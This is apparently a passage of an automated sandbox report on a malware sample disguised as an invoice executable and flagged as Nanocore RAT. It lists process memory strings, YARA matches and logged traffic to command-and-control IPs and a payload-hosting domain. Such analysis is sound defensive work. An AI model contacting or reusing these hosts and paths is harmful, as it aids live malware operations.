        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cldapi.pdb5 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb} source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb+ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: version.pdb/ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc6.pdbo source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb) source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb\ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdbw source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: mscorlib.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb! source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb[ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb9 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdbO source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdbG source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.674869735.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: clrjit.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbI source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdbi source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbm source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rtutils.pdbs source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: npNiVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdbE source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.733692999.00000000029E6000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Windows.Forms.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb source: WerFault.exe, 00000011.00000003.772873228.0000000004B08000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdbA source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: global trafficTCP traffic: 192.168.2.4:49730 -> 185.157.161.86:50005
        Source: global trafficTCP traffic: 192.168.2.4:49742 -> 157.97.120.21:50005
        Source: global trafficHTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1Host: coroloboxorozor.com
        Source: Joe Sandbox ViewIP Address: 172.67.172.17 172.67.172.17
        Source: Joe Sandbox ViewIP Address: 185.157.161.86 185.157.161.86
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.86
        Source: global trafficHTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1Host: coroloboxorozor.com
        Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html
        Source: powershell.exe, 00000005.00000003.877512223.0000000009A1C000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.938217593.0000000004EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
        Source: powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
        Source: powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000003.748547781.0000000005A2C000.00000004.00000001.sdmpString found in binary or memory: https://go.microd:
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
        Source: CasPol.exe, 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
